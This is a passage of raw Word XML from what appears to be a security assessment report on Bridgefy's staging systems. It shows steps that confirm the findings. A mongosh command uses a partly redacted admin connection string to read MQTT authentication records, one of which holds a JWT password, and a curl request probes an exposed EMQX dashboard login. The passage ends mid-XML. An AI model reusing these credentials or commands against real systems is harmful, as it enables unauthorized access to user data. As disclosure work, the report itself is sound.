    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="368" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This issue can be confirmed by logging into the Dashboard and navigating to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Access Control - Authentication - MongoDB - Settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Password Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Alternatively, the following commands can also be used for verification:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="1544" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mongosh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId59">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>"mongodb+srv://admin-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>sdk:DqnAe[...]wUYsA@staging.whqu3.mongodb.net"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>use bridgefy-app-staging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>db.mqttauthentications.find()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="354" w:right="8137" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="354" w:right="8137" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ObjectId(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"63c5880e14778493342ee44a"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'1e359492-d4cb-49d4-bd16-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>f44da7e79afd'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'eyJhbGciOiJSUzI1NiIsImtpZCI6ImY1NWU0ZDkxOGE0ODY0YWQxMzUxMDViYmRjMDEwYWY5Njc5YzM0MTMiLC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>J0eXAiOiJKV1QifQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.eyJuYW1lIjoiTWFudWVsIFBpbmVkYS[...]UuY29tIn19.XjPR8ZCSetU[...]zIqJeVKo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>g'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>superUser: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1115" w:right="3596" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>createdAt:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ISODate(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"2023-01-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>16T17:23:26.520Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>), updatedAt: ISODate(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"2023-01-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>16T17:23:26.520Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="53"/>
          <w:sz w:val="18"/>
          <w:u w:val="single" w:color="323232"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>v:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>administrative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>interfaces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>whitelisting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note the previous issues are in part exploitable due to these administrative interfaces being exposed to the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>restrictions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EMQX Dashboard and the MongoDB allow attackers to log in from any IP address can be confirmed by running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"username":"admin","password":"wrongpass"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://staging.broker.bridgefy.services/api/v5/login'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-length: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-type: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
